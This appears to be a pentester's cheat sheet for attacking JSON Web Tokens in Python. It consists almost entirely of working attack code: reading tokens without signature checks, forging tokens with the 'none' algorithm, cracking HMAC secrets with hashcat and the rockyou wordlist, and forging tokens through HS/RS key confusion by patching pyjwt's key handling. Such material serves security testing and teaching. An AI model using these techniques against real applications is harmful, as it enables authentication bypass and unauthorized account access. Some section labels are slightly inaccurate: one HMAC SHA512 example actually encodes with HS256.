Json Web Token


JWT With Python

JWT python3 library, usefull for exploit ;)
python3 -m pip install --upgrade pyjwt[crypto]

READ JWT

echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzb21lIjoicGF5bG9hZCJ9.4twFt5NiznN84AWoo1d7KO1T_yoc0Z6XOpOVswacPZg"| python -c 'import sys,jwt;t=str(sys.stdin.readlines());h=jwt.get_unverified_header(t);p=jwt.decode(t, options={"verify_signature": 0});print(f"{h}{p}")'

NONE Algorithm

import jwt
payload = {'user': 'value'}
token = jwt.encode(payload, key=None, algorithm=None)
print(token) # eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VyIjoidmFsdWUifQ.

HMAC SHA512 Cracking

# Put JWT in a file
echo "eyJraWQiOiI2NDNlYTVhMy1kY2JmLTRhNDAtODkzYS0yYTliNTI3ZDNiZTUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2MDY1NjA5OH0.S0o9u2K26z0C6edZT0QirPPBcgY7pBi8hYACGW29k60">jwt.txt

# Crack with Wordlist
hashcat -a0 -m 16500 jwt.txt /usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou.txt --potfile-path=potfile.txt

# Crack with Bruteforce
hashcat -a3 -m 16500 jwt.txt --potfile-path=potfile.txt
import jwt
payload = {'user': 'value'}
password = 'secret1'
token = jwt.encode(payload, password, algorithm='HS256')
print(token) # eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJ1c2VyIjoidmFsdWUifQ.KM5d456Dfj9X_Uuch4faQUADvDofZ4Y1Lktsa6MTJgnaeEkhJ1F1E9ecgbLHkp69zeDmKdqlur0M4zSwJ0YG0A

HMAC SHA512 & RSA512 Confusion

import jwt
payload = {'user': 'value'}

# Remove security verifications in prepare_key function in order to force HS/RS Confusion
def prepare_key(self, key): return key
jwt.algorithms.HMACAlgorithm.prepare_key = prepare_key

# Use public key as password
password = "[...]PUBKEY[...]".encode()

print(jwt.encode(payload, password, algorithm='HS512'))